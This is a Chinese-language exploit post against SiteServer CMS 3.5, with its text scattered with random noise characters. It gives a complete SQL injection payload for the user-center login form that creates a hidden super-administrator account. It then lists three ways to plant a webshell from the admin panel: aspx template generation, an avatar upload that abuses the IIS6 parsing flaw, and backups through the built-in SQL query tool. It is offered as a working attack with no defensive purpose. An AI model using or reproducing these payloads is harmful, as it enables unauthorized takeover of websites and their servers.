经测试秒杀最新的3.5版( a9 `3 T# R: h' E+ d. U
stieserver官网:www.siteserver.cn0 {& t5 U* d. A
EXP:6 K" ^! J- _) b8 @; b9 g! X
直接访问UserCenter/login.aspx" @$ m' `$ K$ h4 Q1 O5 h
用户名处输入:/ P' s4 K) Z7 t/ a$ v8 k) D4 h' G
, @! j9 B% I; V( }8 I123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
3 P6 K3 W- _. w/ V0 h- [. [" v2 _( C密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。1 L' `- ~: w& i! V4 R
之后再访问后台SiteServer/login.aspx用插入的用户登陆
6 T a& m% l# z后台拿webshell的三种方法:
) D) |+ t& d7 B" w3 N3 F+ X一、
; U# `0 U0 D& X- J. _+ o: B站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx$ R9 w8 Z2 W0 J9 } i7 a1 y
二、9 }4 |' u7 t. [: m F' K
成员权限-》添加用户-》用户名为:1.asp
3 b& E# y; ~- l0 F& L3 bhttp://127.0.0.1/usercenter/
# Q. U' D) n/ T5 }用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell/ s+ C2 S0 d) N5 H9 }! h/ u5 {
(ps:后台添加用户时不会验证是否含有非法字符)' R% S# D0 v3 S% w2 a: _3 O7 c
三、! j& S, k; h: ]5 |1 k& u
系统工具-》实用工具-》机器参数查看4 ]# a* e& a# s! k
可以看到数据库类型、名称,WEB路径0 ^$ r- ^8 ?" A, p6 X* i
系统工具-》数据库工具-》SQL语句查询& g: ` R+ ?/ O) J3 S- S
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |